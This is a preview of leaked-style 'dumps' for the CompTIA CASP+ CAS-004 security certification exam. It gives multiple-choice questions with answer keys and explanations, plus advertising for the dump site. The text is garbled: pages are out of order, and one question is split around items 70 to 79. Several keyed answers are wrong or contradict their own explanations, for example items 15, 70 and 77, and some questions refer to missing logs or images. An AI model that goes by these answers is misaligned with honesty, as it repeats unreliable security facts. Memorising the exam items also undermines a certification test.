CAS-004 Updated Dumps - CompTIA Advanced Security Practitioner (CASP) Exam

Text Material Preview

<p>CAS-004</p><p>Exam Name: CompTIA Advanced Security Practitioner</p><p>(CASP+) Exam</p><p>Full version: 507 Q&As</p><p>Full version of CAS-004 Dumps</p><p>Share some CAS-004 exam dumps below.</p><p>1. A new, online file hosting service is being offered.</p><p>The service has the following security requirements:</p><p>• Threats to customer data integrity and availability should be remediated first.</p><p>• The environment should be dynamic to match increasing customer demands.</p><p>1 / 44</p><p>https://www.certqueen.com/CAS-004.html</p><p>• The solution should not interfere with customers" ability to access their data at anytime.</p><p>• Security analysts should focus on high-risk items.</p><p>Which of the following would BEST satisfy the requirements?</p><p>A. Expanding the use of IPS and NGFW devices throughout the environment</p><p>B. Increasing the number of analysts to Identify risks that need remediation</p><p>C. Implementing a SOAR solution to address known threats</p><p>D. Integrating enterprise threat feeds in the existing SIEM</p><p>Answer: C</p><p>Explanation:</p><p>A SOAR (Security Orchestration, Automation, and Response) solution is a software platform</p><p>that can automate the detection and response of known threats, such as ransomware, phishing,</p><p>or denial-of-service attacks. A SOAR solution can also integrate with other security tools, such</p><p>as IPS, NGFW, SIEM, and threat feeds, to provide a comprehensive and dynamic security</p><p>posture. A SOAR solution would best satisfy the requirements of the online file hosting service,</p><p>because it would:</p><p>Remediate threats to customer data integrity and availability first, by automatically applying</p><p>predefined actions or workflows based on the severity and type of the threat.</p><p>Allow the environment to be dynamic to match increasing customer demands, by scaling up or</p><p>down the security resources and processes as needed.</p><p>Not interfere with customers’ ability to access their data at anytime, by minimizing the human</p><p>intervention and downtime required for threat response.</p><p>Enable security analysts to focus on high-risk items, by reducing the manual tasks and alert</p><p>fatigue associated with threat detection and response.</p><p>Reference: CASP+ (Plus) CompTIA Advanced Security Practitioner Certification …</p><p>2. A PKI engineer is defining certificate templates for an organization's CA and would like to</p><p>ensure at least two of the possible SAN certificate extension fields populate for documentation</p><p>purposes.</p><p>Which of the following are explicit options within this extension? (Select two).</p><p>A. Type</p><p>B. Email</p><p>C. OCSP responder</p><p>D. Registration authority</p><p>E. Common Name</p><p>F. DNS name</p><p>Answer: BF</p><p>2 / 44</p><p>Explanation:</p><p>The SAN (Subject Alternative Name) field in a certificate can include multiple types of entries,</p><p>including DNS names and email addresses. These are explicit options within the SAN</p><p>extension, allowing a single certificate to be valid for multiple domain names and email</p><p>addresses. This is often used in multi-domain SSL certificates, where a single certificate needs</p><p>to be valid for multiple subdomains or different domain names.</p><p>3. Immediately following the report of a potential breach, a security engineer creates a forensic</p><p>image of the server in question as part of the organization incident response procedure.</p><p>Which of the must occur to ensure the integrity of the image?</p><p>A. The image must be password protected against changes.</p><p>B. A hash value of the image must be computed.</p><p>C. The disk containing the image must be placed in a seated container.</p><p>D. A duplicate copy of the image must be maintained</p><p>Answer: B</p><p>4. A company is implementing SSL inspection. During the next six months, multiple web</p><p>applications that will be separated out with subdomains will be deployed.</p><p>Which of the following will allow the inspection of the data without multiple certificate</p><p>deployments?</p><p>A. Include all available cipher suites.</p><p>B. Create a wildcard certificate.</p><p>C. Use a third-party CA.</p><p>D. Implement certificate pinning.</p><p>Answer: B</p><p>Explanation:</p><p>A wildcard certificate is a certificate that can be used for multiple subdomains of a domain, such</p><p>as *.example.com. This would allow the inspection of the data without multiple certificate</p><p>deployments, as one wildcard certificate can cover all the subdomains that will be separated out</p><p>with subdomains. Including all available cipher suites may not help with inspecting the data</p><p>without multiple certificate deployments, as cipher suites are used for negotiating encryption and</p><p>authentication algorithms, not for verifying certificates. Using a third-party CA (certificate</p><p>authority) may not help with inspecting the data without multiple certificate deployments, as a</p><p>third-party CA is an entity that issues and validates certificates, not a type of certificate.</p><p>Implementing certificate pinning may not help with inspecting the data without multiple certificate</p><p>deployments, as certificate pinning is a technique that hardcodes the expected certificate or</p><p>3 / 44</p><p>public key in the application code, not a type of certificate.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-a-wildcard-certificate</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>5. A security administrator is setting up a virtualization solution that needs to run services from a</p><p>single host. Each service should be the only one running in its environment. Each environment</p><p>needs to have its own operating system as a base but share the kernel version and properties</p><p>of the running host.</p><p>Which of the following technologies would best meet these requirements?</p><p>A. Containers</p><p>B. Type 1 hypervisor</p><p>C. Type 2 hypervisor</p><p>D. Virtual desktop infrastructure</p><p>E. Emulation</p><p>Answer: A</p><p>Explanation:</p><p>The most appropriate technology for this virtualization solution is containers. Containers allow</p><p>multiple services to run on a single host with isolated environments, while sharing the same</p><p>kernel version and properties of the host operating system. Each container has its own instance</p><p>of the operating system and runs independently from the others, meeting the requirement for</p><p>separate environments with their own OS. Containers are more lightweight than full hypervisors</p><p>and are ideal for running microservices in isolated environments. CASP+ emphasizes the use of</p><p>containers in scenarios where services need to be isolated but share the same host OS kernel.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 3.0 C Enterprise Security Architecture</p><p>(Virtualization Technologies, Containers)</p><p>CompTIA CASP+ Study Guide: Virtualization and Containerization for Isolated Services</p><p>6. A company publishes several APIs for customers and is required to use keys to segregate</p><p>customer data sets.</p><p>Which of the following would be BEST to use to store customer keys?</p><p>A. A trusted platform module</p><p>B. A hardware security module</p><p>C. A localized key store</p><p>D. A public key infrastructure</p><p>Answer: D</p><p>4 / 44</p><p>Explanation:</p><p>A public key infrastructure (PKI) is a system of certificates and keys that can provide encryption</p><p>and authentication for APIs (application programming interfaces). A PKI can be used to store</p><p>customer keys for accessing APIs and segregating customer data sets. A trusted platform</p><p>module (TPM) is a hardware device that provides cryptographic functions and key storage, but it</p><p>is not suitable for storing customer keys for APIs. A hardware security module (HSM) is similar</p><p>to a TPM, but it is used for storing keys for applications, not for APIs. A localized key store is a</p><p>software component that stores keys locally, but it is not as secure or scalable as a PKI.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-pki</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>7. After investigating a recent security incident, a SOC analyst is charged with creating a</p><p>reference guide for the entire team to use.</p><p>Which of the following should the analyst create to address future incidents?</p><p>A.</p><p>analysts to identify, understand, and prioritize potential threats, as well as to</p><p>develop effective detection and response strategies. MITRE ATT&CK covers the entire lifecycle</p><p>of a cyberattack, from initial access to impact, and provides information on how to mitigate,</p><p>detect, and hunt for each technique. It also includes threat actor profiles, software descriptions,</p><p>and data sources that can be used for threat intelligence and analysis. MITRE ATT&CK is the</p><p>most likely resource that a security analyst would adopt to implement the most up-to-date and</p><p>effective security methodologies for their clients.</p><p>Verified Reference:</p><p>https://attack.mitre.org/</p><p>https://resources.infosecinstitute.com/topic/top-threat-modeling-frameworks-stride-owasp-</p><p>top-10-mitre-attck-framework/</p><p>70. A healthcare system recently suffered from a ransomware incident As a result the board of</p><p>37 / 44</p><p>directors decided to hire a security consultant to improve existing network security. The security</p><p>consultant found that the healthcare network was completely flat, had no privileged access limits</p><p>and had open RDP access to servers with personal health information.</p><p>As the consultant builds the remediation plan, which of the following solutions would BEST</p><p>solve these challenges? (Select THREE).</p><p>A. SD-WAN</p><p>B. PAM</p><p>C. Remote access VPN</p><p>D. MFA</p><p>E. Network segmentation</p><p>F. BGP</p><p>G. NAC</p><p>Answer: A, C, E</p><p>71. An auditor needs to scan documents at rest for sensitive text. These documents contain</p><p>both text and Images.</p><p>Which of the following software functionalities must be enabled in the DLP solution for the</p><p>auditor to be able to fully read these documents? (Select TWO).</p><p>A. Document interpolation</p><p>B. Regular expression pattern matching</p><p>C. Optical character recognition functionality</p><p>D. Baseline image matching</p><p>E. Advanced rasterization</p><p>F. Watermarking</p><p>Answer: AC</p><p>72. A small company recently developed prototype technology for a military program. The</p><p>company’s security engineer is concerned about potential theft of the newly developed,</p><p>proprietary information.</p><p>Which of the following should the security engineer do to BEST manage the threats proactively?</p><p>A. Join an information-sharing community that is relevant to the company.</p><p>B. Leverage the MITRE ATT&CK framework to map the TTR.</p><p>C. Use OSINT techniques to evaluate and analyze the threats.</p><p>D. Update security awareness training to address new threats, such as best practices for data</p><p>security.</p><p>Answer: A</p><p>38 / 44</p><p>Explanation:</p><p>An information-sharing community is a group or network of organizations that share threat</p><p>intelligence, best practices, and mitigation strategies related to cybersecurity. An information-</p><p>sharing community can help the company proactively manage the threats of potential theft of its</p><p>newly developed, proprietary information by providing timely and actionable insights, alerts, and</p><p>recommendations. An information-sharing community can also enable collaboration and</p><p>coordination among its members to enhance their collective defense and resilience.</p><p>Reference:</p><p>https://us-cert.cisa.gov/ncas/tips/ST04-016 https://www.cisecurity.org/blog/what-is-an-</p><p>information-sharing-community/</p><p>73. A company is experiencing a large number of attempted network-based attacks against its</p><p>online store.</p><p>To determine the best course of action, a security analyst reviews the following logs.</p><p>Which of the following should the company do next to mitigate the risk of a compromise from</p><p>these attacks?</p><p>A. Restrict HTTP methods.</p><p>B. Perform parameterized queries.</p><p>C. Implement input sanitization.</p><p>D. Validate content types.</p><p>Answer: A</p><p>Explanation:</p><p>Restricting HTTP methods can mitigate the risk of network-based attacks against an online</p><p>store by limiting the types of HTTP requests that the server will accept, thus reducing the attack</p><p>surface. This is a common method to prevent web-based attacks such as Cross-Site Scripting</p><p>(XSS) and SQL Injection.</p><p>74. A large organization is planning to migrate from on premises to the cloud. The Chief</p><p>Information Security Officer (CISO) is concerned about security responsibilities.</p><p>If the company decides to migrate to the cloud, which of the following describes who is</p><p>responsible for the security of the new physical datacenter?</p><p>A. Third-party assessor</p><p>B. CSP</p><p>39 / 44</p><p>C. Organization</p><p>D. Shared responsibility</p><p>Answer: B</p><p>Explanation:</p><p>In cloud computing models, the security of the physical data center is the responsibility of the</p><p>Cloud Service Provider (CSP). The CSP is responsible for protecting the infrastructure that runs</p><p>all of the services offered in the cloud, which includes the physical security of the data center.</p><p>75. After installing an unapproved application on a personal device, a Chief Executive Officer</p><p>reported an incident to a security analyst. This device is not controlled by the MDM solution, as</p><p>stated in the BYOD policy. However, the device contained critical confidential information.</p><p>The cyber incident response team performed the analysis on the device and found the following</p><p>log:</p><p>Which of the following is the most likely reason for the successful attack?</p><p>A. Lack of MDM controls</p><p>B. Auto-join hotspots enabled</p><p>C. Sideloading</p><p>D. Lack of application segmentation</p><p>Answer: A</p><p>Explanation:</p><p>A lack of Mobile Device Management (MDM) controls can lead to successful attacks because</p><p>MDM solutions provide the ability to enforce security policies, remotely wipe sensitive data, and</p><p>manage software updates, which can prevent unauthorized access and protect corporate data.</p><p>Without MDM, personal devices are more vulnerable to security risks.</p><p>76. A company wants to quantify and communicate the effectiveness of its security controls but</p><p>must establish measures.</p><p>Which of the following is MOST likely to be included in an effective assessment roadmap for</p><p>these controls?</p><p>A. Create a change management process.</p><p>B. Establish key performance indicators.</p><p>C. Create an integrated master schedule.</p><p>D. Develop a communication plan.</p><p>40 / 44</p><p>E. Perform a security control assessment.</p><p>Answer: C</p><p>77. A security administrator has been provided with three separate certificates and is trying to</p><p>organize them into a single chain of trust to deploy on a website.</p><p>Given the following certificate properties:</p><p>Which of the following are true about the PKI hierarchy? (Select two).</p><p>A. www.budgetcert.com.is the top-level CA.</p><p>B. www.budgetcert.com. is an intermediate CA.</p><p>C. SuperTrust RSA 2018 is the top-level CA.</p><p>D. SuperTrust RSA 2018 is an intermediate CA.</p><p>E. BudgetCert is the top-level CA</p><p>F. BudgetCert is an intermediate CA.</p><p>Answer: C, E</p><p>Explanation:</p><p>Based on the given certificate properties:</p><p>SuperTrust RSA 2018 is an intermediate certificate authority (CA) because it is issued by</p><p>BudgetCert Global Root CA, which is the top-level certificate authority.</p><p>BudgetCert is the top-level CA (root CA) in this public key infrastructure (PKI) hierarchy, as it</p><p>issues certificates to SuperTrust RSA 2018 and has no issuer of its own.</p><p>Therefore, SuperTrust RSA 2018 is the intermediate CA, and BudgetCert is the top-level (root)</p><p>CA in</p><p>this PKI chain of trust. The www.budgetcert.com certificate is the leaf or end-entity certificate,</p><p>which</p><p>is used for the website itself.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 3.0 C Enterprise Security Architecture</p><p>(PKI and Certificate Chains of Trust)</p><p>41 / 44</p><p>CompTIA CASP+ Study Guide: PKI Hierarchy and Certificate Trust Models</p><p>78. A new web server must comply with new secure-by-design principles and PCI DSS. This</p><p>includes mitigating the risk of an on-path attack.</p><p>A security analyst is reviewing the following web server configuration:</p><p>Which of the following ciphers should the security analyst remove to support the business</p><p>requirements?</p><p>A. TLS_AES_128_CCM_8_SHA256</p><p>B. TLS_DHE_DSS_WITH_RC4_128_SHA</p><p>C. TLS_CHACHA20_POLY1305_SHA256</p><p>D. TLS_AES_128_GCM_SHA256</p><p>Answer: B</p><p>Explanation:</p><p>The security analyst should remove the cipher TLS_DHE_DSS_WITH_RC4_128_SHA to</p><p>support the business requirements, as it is considered weak and vulnerable to on-path attacks.</p><p>RC4 is an outdated stream cipher that has been deprecated by major browsers and protocols</p><p>due to its flaws and weaknesses. The other ciphers are more secure and compliant with secure-</p><p>by-design principles and PCI DSS.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-a-cipher</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>79. A security consultant needs to set up wireless security for a small office that does not have</p><p>42 / 44</p><p>Active Directory. Despite the lack of central account management, the office manager wants to</p><p>ensure a high level of defense to prevent brute-force attacks against wireless authentication.</p><p>Which of the following technologies would BEST meet this need?</p><p>A. Faraday cage</p><p>B. WPA2 PSK</p><p>C. WPA3 SAE</p><p>D. WEP 128 bit</p><p>Answer: C</p><p>Explanation:</p><p>WPA3 SAE prevents brute-force attacks.</p><p>“WPA3 Personal (WPA-3 SAE) Mode is a static passphrase-based method. It provides better</p><p>security than what WPA2 previously provided, even when a non-complex password is used,</p><p>thanks to Simultaneous Authentication of Equals (SAE), the personal authentication process of</p><p>WPA3.”</p><p>More Hot Exams are available.</p><p>43 / 44</p><p>https://www.certqueen.com/promotion.asp</p><p>350-401 ENCOR Exam Dumps</p><p>350-801 CLCOR Exam Dumps</p><p>200-301 CCNA Exam Dumps</p><p>Powered by TCPDF (www.tcpdf.org)</p><p>44 / 44</p><p>https://www.certqueen.com/350-401.html</p><p>https://www.certqueen.com/350-801.html</p><p>https://www.certqueen.com/200-301.html</p><p>http://www.tcpdf.org</p><p>Root cause analysis</p><p>B. Communication plan</p><p>C. Runbook</p><p>D. Lessons learned</p><p>Answer: C</p><p>Explanation:</p><p>A runbook is a detailed guide that provides step-by-step instructions on how to respond to</p><p>specific types of incidents. It is used by the SOC team to ensure a consistent, organized, and</p><p>efficient response to incidents. In this case, after the incident investigation, creating a runbook</p><p>would help standardize the response process for future security incidents, enabling the team to</p><p>act quickly and effectively. CASP+ emphasizes the importance of having detailed runbooks for</p><p>incident response as part of an organization's overall incident response strategy.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 C Enterprise Security Operations</p><p>(Incident Response and Runbooks)</p><p>CompTIA CASP+ Study Guide: Incident Response Procedures and Runbooks</p><p>8. A senior security analyst is helping the development team improve the security of an</p><p>application that is being developed. The developers use third-party libraries and applications.</p><p>The software in development used old, third-party packages that were not replaced before</p><p>market distribution.</p><p>Which of the following should be implemented into the SDLC to resolve the issue?</p><p>5 / 44</p><p>A. Software composition analysis</p><p>B. A SCAP scanner</p><p>C. ASAST</p><p>D. A DAST</p><p>Answer: A</p><p>Explanation:</p><p>Software Composition Analysis (SCA) is a process that identifies the open-source components</p><p>used in software development to manage the risks associated with third-party components.</p><p>Implementing SCA into the Software Development Life Cycle (SDLC) can help identify outdated</p><p>third-party packages and ensure they are replaced or updated before the software is distributed.</p><p>9. A company is looking to fortify its cybersecurity defenses and is focusing on its network</p><p>infrastructure. The solution cannot affect the availability of the company’s services to ensure</p><p>false positives do not drop legitimate traffic.</p><p>Which of the following would satisfy the requirement?</p><p>A. NIDS</p><p>B. NIPS</p><p>C. WAF</p><p>D. Reverse proxy</p><p>Answer: A</p><p>Explanation:</p><p>Reference:</p><p>https://subscription.packtpub.com/book/networking-and-</p><p>servers/9781782174905/5/ch05lvl1sec38/differentiating-between-nids-and-nips</p><p>https://owasp.org/www-community/controls/Intrusion_Detection</p><p>A NIDS (Network Intrusion Detection System) is a security solution that monitors network traffic</p><p>for signs of malicious activity, such as attacks, intrusions, or policy violations. A NIDS does not</p><p>affect the availability of the company’s services because it operates in passive mode, which</p><p>means it does not block or modify traffic. Instead, it alerts the network administrator or other</p><p>security tools when it detects an anomaly or threat.</p><p>Reference:</p><p>https://www.cisco.com/c/en/us/products/security/what-is-network-intrusion-detection-</p><p>system.html</p><p>https://www.imperva.com/learn/application-security/network-intrusion-detection-system-nids/</p><p>10. Ransomware encrypted the entire human resources fileshare for a large financial institution.</p><p>6 / 44</p><p>Security operations personnel were unaware of the activity until it was too late to stop it. The</p><p>restoration will take approximately four hours, and the last backup occurred 48 hours ago. The</p><p>management team has indicated that the RPO for a disaster recovery event for this data</p><p>classification is 24 hours.</p><p>Based on RPO requirements, which of the following recommendations should the management</p><p>team make?</p><p>A. Leave the current backup schedule intact and pay the ransom to decrypt the data.</p><p>B. Leave the current backup schedule intact and make the human resources fileshare read-</p><p>only.</p><p>C. Increase the frequency of backups and create SIEM alerts for IOCs.</p><p>D. Decrease the frequency of backups and pay the ransom to decrypt the data.</p><p>Answer: C</p><p>Explanation:</p><p>Increasing the frequency of backups and creating SIEM (security information and event</p><p>management) alerts for IOCs (indicators of compromise) are the best recommendations that the</p><p>management team can make based on RPO (recovery point objective) requirements. RPO is a</p><p>metric that defines the maximum acceptable amount of data loss that can occur during a</p><p>disaster recovery event. Increasing the frequency of backups can reduce the amount of data</p><p>loss that can occur, as it can create more recent copies or snapshots of the data. Creating</p><p>SIEM alerts for IOCs can help detect and respond to ransomware attacks, as it can collect,</p><p>correlate, and analyze security events and data from various sources and generate alerts based</p><p>on predefined rules or thresholds. Leaving the current backup schedule intact and paying the</p><p>ransom to decrypt the data are not good recommendations, as they could result in more data</p><p>loss than the RPO allows, as well as encourage more ransomware attacks or expose the</p><p>company to legal or ethical issues. Leaving the current backup schedule intact and making the</p><p>human resources fileshare read-only are not good recommendations, as they could result in</p><p>more data loss than the RPO allows, as well as affect the normal operations or functionality of</p><p>the fileshare. Decreasing the frequency of backups and paying the ransom to decrypt the data</p><p>are not good recommendations, as they could result in more data loss than the RPO allows, as</p><p>well as increase the risk of losing data due to less frequent backups or unreliable decryption.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-rpo</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>11. A security researcher detonated some malware in a lab environment and identified the</p><p>following commands running from the EDR tool:</p><p>7 / 44</p><p>With which of the following MITRE ATT&CK TTPs is the command associated? (Select TWO).</p><p>A. Indirect command execution</p><p>B. OS credential dumping</p><p>C. Inhibit system recovery</p><p>D. External remote services</p><p>E. System information discovery</p><p>F. Network denial of service</p><p>Answer: BE</p><p>Explanation:</p><p>OS credential dumping is the process of obtaining account login and password information,</p><p>normally in the form of a hash or a clear text password, from the operating system and software.</p><p>System information discovery is the process of gathering information about the system, such as</p><p>hostname, IP address, OS version, running processes, etc. Both of these techniques are</p><p>commonly used by adversaries to gain access to sensitive data and resources on the target</p><p>system. The command shown in the image is using Mimikatz, a tool that can dump credentials</p><p>from memory, and also querying the system information using WMIC.</p><p>Verified Reference:</p><p>https://attack.mitre.org/techniques/T1003/</p><p>https://attack.mitre.org/techniques/T1082/</p><p>https://github.com/gentilkiwi/mimikatz https://docs.microsoft.com/en-</p><p>us/windows/win32/wmisdk/wmic</p><p>12. A security analyst is participating in a risk assessment and is helping to calculate the</p><p>exposure factor associated with various systems and processes within the organization.</p><p>Which of the following resources would be most useful to calculate the exposure factor in this</p><p>scenario?</p><p>A. Gap analysis</p><p>B. Business impact analysis</p><p>C. Risk register</p><p>D. Information security policy</p><p>E. Lessons learned</p><p>Answer: B</p><p>8 / 44</p><p>Explanation:</p><p>A business impact analysis (BIA) is the most useful resource for calculating the exposure factor</p><p>in a risk assessment. The BIA helps identify the criticality of systems and processes and</p><p>quantifies the potential financial and operational impact of vulnerabilities being exploited. By</p><p>understanding the business impact, the security team can more accurately determine the</p><p>exposure factor, which is the proportion of an asset's value that is at risk in the event of a</p><p>security incident. CASP+ highlights the role of BIAs in understanding risk exposure and</p><p>supporting effective risk management decisions.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 1.0 C Risk Management (Business</p><p>Impact</p><p>Analysis and Risk Exposure)</p><p>CompTIA CASP+ Study Guide: Business Impact Analysis for Risk Assessment</p><p>13. An organization established an agreement with a partner company for specialized help desk</p><p>services. A senior security officer within the organization Is tasked with providing documentation</p><p>required to set up a dedicated VPN between the two entities.</p><p>Which of the following should be required?</p><p>A. SLA</p><p>B. ISA</p><p>C. NDA</p><p>D. MOU</p><p>Answer: B</p><p>Explanation:</p><p>An ISA, or interconnection security agreement, is a document that should be required to set up</p><p>a dedicated VPN between two entities that provide specialized help desk services. An ISA</p><p>defines the technical and security requirements for establishing, operating, and maintaining a</p><p>secure connection between two or more organizations. An ISA also specifies the roles and</p><p>responsibilities of each party, the security controls and policies to be implemented, the data</p><p>types and classifications to be exchanged, and the incident response procedures to be followed.</p><p>Reference: [CompTIA CASP+ Study Guide, Second Edition, page 36]</p><p>14. A security engineer is creating a single CSR for the following web server hostnames:</p><p>• wwwint internal</p><p>• www company com</p><p>• home.internal</p><p>• www internal</p><p>Which of the following would meet the requirement?</p><p>9 / 44</p><p>A. SAN</p><p>B. CN</p><p>C. CA</p><p>D. CRL</p><p>E. Issuer</p><p>Answer: A</p><p>Explanation:</p><p>Subject Alternative Name (SAN) is a part of the X.509 specification for SSL certificates that</p><p>allows multiple domain names to be protected under a single SSL certificate. Using SAN is the</p><p>most suitable option when a single Certificate Signing Request (CSR) needs to cover multiple</p><p>hostnames. It enables the security engineer to list all the required hostnames in one certificate,</p><p>ensuring secure communications for each listed entity without the need for separate certificates.</p><p>15. An organization’s assessment of a third-party, non-critical vendor reveals that the vendor</p><p>does not have cybersecurity insurance and IT staff turnover is high. The organization uses the</p><p>vendor to move customer office equipment from one service location to another. The vendor</p><p>acquires customer data and access to the business via an API.</p><p>Given this information, which of the following is a noted risk?</p><p>A. Feature delay due to extended software development cycles</p><p>B. Financial liability from a vendor data breach</p><p>C. Technical impact to the API configuration</p><p>D. The possibility of the vendor’s business ceasing operations</p><p>Answer: A</p><p>Explanation:</p><p>Reference: https://legal.thomsonreuters.com/en/insights/articles/data-breach-liability</p><p>16. A systems administrator is preparing to run a vulnerability scan on a set of information</p><p>systems in the organization. The systems administrator wants to ensure that the targeted</p><p>systems produce accurate information especially regarding configuration settings.</p><p>Which of the following scan types will provide the systems administrator with the MOST</p><p>accurate information?</p><p>A. A passive, credentialed scan</p><p>B. A passive, non-credentialed scan</p><p>C. An active, non-credentialed scan</p><p>D. An active, credentialed scan</p><p>Answer: D</p><p>10 / 44</p><p>17. A common industrial protocol has the following characteristics:</p><p>• Provides for no authentication/security</p><p>• Is often implemented in a client/server relationship</p><p>• Is implemented as either RTU or TCP/IP</p><p>Which of the following is being described?</p><p>A. Profinet</p><p>B. Modbus</p><p>C. Zigbee</p><p>D. Z-Wave</p><p>Answer: B</p><p>Explanation:</p><p>The protocol described is Modbus, which is a commonly used industrial protocol that lacks built-</p><p>in authentication and security features. Modbus operates in a client/server model and can be</p><p>implemented over RTU (Remote Terminal Unit) or TCP/IP for communication between devices.</p><p>The other protocols mentioned either have different characteristics or are used in different</p><p>contexts (such as Profinet for industrial automation, Zigbee for wireless IoT devices, and Z-</p><p>Wave for home automation). CASP+ identifies Modbus as a critical protocol in industrial</p><p>environments that lacks security and requires additional protective measures.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 4.0 C Industrial Control Systems (ICS)</p><p>and Modbus Protocol</p><p>CompTIA CASP+ Study Guide: Industrial Protocols and Modbus Security</p><p>18. A control systems analyst is reviewing the defensive posture of engineering workstations on</p><p>the shop floor.</p><p>Upon evaluation, the analyst makes the following observations:</p><p>• Unsupported, end-of-life operating systems were still prevalent on the shop floor.</p><p>• There are no security controls for systems with supported operating systems.</p><p>• There is little uniformity of installed software among the workstations.</p><p>Which of the following would have the greatest impact on the attack surface?</p><p>A. Deploy antivirus software to all of the workstations.</p><p>B. Increase the level of monitoring on the workstations.</p><p>C. Utilize network-based allow and block lists.</p><p>D. Harden all of the engineering workstations using a common strategy.</p><p>Answer: D</p><p>Explanation:</p><p>11 / 44</p><p>Hardening the engineering workstations using a consistent strategy would have the greatest</p><p>impact on reducing the attack surface. The workstations are running outdated and unsupported</p><p>operating systems, with no security controls, and inconsistent software installations, which</p><p>significantly increases the risk of exploitation. Hardening involves applying patches, reducing</p><p>unnecessary software, disabling unused services, and ensuring uniform security controls across</p><p>all systems. By addressing these vulnerabilities and inconsistencies, the overall security posture</p><p>improves significantly, which aligns with CASP+ best practices on reducing attack surfaces by</p><p>standardizing and securing endpoint configurations.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 1.0 C Risk Management (Vulnerability</p><p>Management, System Hardening)</p><p>CompTIA CASP+ Study Guide: Hardening Techniques and Attack Surface Reduction</p><p>19. A company’s product site recently had failed API calls, resulting in customers being unable</p><p>to check out and purchase products. This type of failure could lead to the loss of customers and</p><p>damage to the company’s reputation in the market.</p><p>Which of the following should the company implement to address the risk of system</p><p>unavailability?</p><p>A. User and entity behavior analytics</p><p>B. Redundant reporting systems</p><p>C. A self-healing system</p><p>D. Application controls</p><p>Answer: D</p><p>20. Which of the following indicates when a company might not be viable after a disaster?</p><p>A. Maximum tolerable downtime</p><p>B. Recovery time objective</p><p>C. Mean time to recovery</p><p>D. Annual loss expectancy</p><p>Answer: A</p><p>Explanation:</p><p>The indicator that shows when a company might not be viable after a disaster is the maximum</p><p>tolerable downtime (MTD). MTD is the maximum amount of time that a business process or</p><p>function can be disrupted without causing unacceptable consequences for the organization.</p><p>MTD is a key metric for business continuity planning and disaster recovery, as it helps</p><p>determine the recovery time objective (RTO) and the recovery point objective (RPO) for each</p><p>process or function. If the actual downtime exceeds the MTD, the organization may face severe</p><p>12 / 44</p><p>losses, reputational damage, regulatory penalties, or even bankruptcy.</p><p>Verified Reference:</p><p>https://www.techtarget.com/searchdisasterrecovery/definition/maximum-tolerable-downtime</p><p>https://www.techtarget.com/searchdisasterrecovery/definition/recovery-time-objective</p><p>https://www.techtarget.com/searchdisasterrecovery/definition/recovery-point-objective</p><p>21. An organization recently started processing, transmitting, and storing its customers’ credit</p><p>card information. Within a week of doing so, the organization suffered a massive breach that</p><p>resulted in the exposure of the customers’ information.</p><p>Which of the following provides the BEST guidance for protecting such information while</p><p>it is at</p><p>rest and in transit?</p><p>A. NIST</p><p>B. GDPR</p><p>C. PCI DSS</p><p>D. ISO</p><p>Answer: C</p><p>Explanation:</p><p>PCI DSS (Payment Card Industry Data Security Standard) is a standard that provides the best</p><p>guidance for protecting credit card information while it is at rest and in transit. PCI DSS is a</p><p>standard that defines the security requirements and best practices for organizations that</p><p>process, store, or transmit credit card information, such as merchants, service providers, or</p><p>acquirers. PCI DSS aims to protect the confidentiality, integrity, and availability of credit card</p><p>information and prevent fraud or identity theft. NIST (National Institute of Standards and</p><p>Technology) is not a standard that provides the best guidance for protecting credit card</p><p>information, but an agency that develops standards, guidelines, and recommendations for</p><p>various fields of science and technology, including cybersecurity. GDPR (General Data</p><p>Protection Regulation) is not a standard that provides the best guidance for protecting credit</p><p>card information, but a regulation that defines the data protection and privacy rights and</p><p>obligations for individuals and organizations in the European Union or the European Economic</p><p>Area. ISO (International Organization for Standardization) is not a standard that provides the</p><p>best guidance for protecting credit card information, but an organization that develops standards</p><p>for various fields of science and technology, including information security.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-pci-dss</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>13 / 44</p><p>22. The security analyst discovers a new device on the company’s dedicated loT subnet during</p><p>the most recent vulnerability scan. The scan results show numerous open ports and insecure</p><p>protocols in addition to default usernames and passwords. A camera needs to transmit video to</p><p>the security server in the loT subnet.</p><p>Which of the following should the security analyst recommend to securely operate the camera?</p><p>A. Harden the camera configuration.</p><p>B. Send camera logs to the SIEM.</p><p>C. Encrypt the camera's video stream.</p><p>D. Place the camera on an isolated segment</p><p>Answer: A</p><p>Explanation:</p><p>To securely operate the camera, the security analyst should recommend hardening the camera</p><p>configuration.</p><p>This involves several steps:</p><p>Changing Default Credentials: Default usernames and passwords are a common vulnerability.</p><p>They should be replaced with strong, unique passwords.</p><p>Disabling Unnecessary Services and Ports: The numerous open ports and insecure protocols</p><p>should be reviewed, and any unnecessary services should be disabled to reduce the attack</p><p>surface. Firmware Updates: Ensuring the camera's firmware is up to date will mitigate known</p><p>vulnerabilities. Enable Encryption: If possible, enable encryption for both data in transit and at</p><p>rest to protect the video stream and other communications from interception.</p><p>This approach addresses the identified vulnerabilities directly and ensures that the device is</p><p>more</p><p>secure. Simply sending logs to the SIEM or isolating the camera might not fully mitigate the</p><p>risks</p><p>associated with default settings and open ports.</p><p>Reference: CompTIA CASP+ CAS-004 Exam Objectives: Section 2.4: Implement security</p><p>activities across the technology life cycle.</p><p>CompTIA CASP+ Study Guide, Chapter 5: Implementing Host Security.</p><p>23. An organization's finance system was recently attacked. A forensic analyst is reviewing the</p><p>contents</p><p>Of the compromised files for credit card data.</p><p>Which of the following commands should the analyst run to BEST determine whether financial</p><p>data was lost?</p><p>14 / 44</p><p>A. Option A</p><p>B. Option B</p><p>C. Option C</p><p>D. Option D</p><p>Answer: C</p><p>24. The Chief Information Security Officer (CISO) asked a security manager to set up a system</p><p>that sends an alert whenever a mobile device enters a sensitive area of the company's data</p><p>center. The 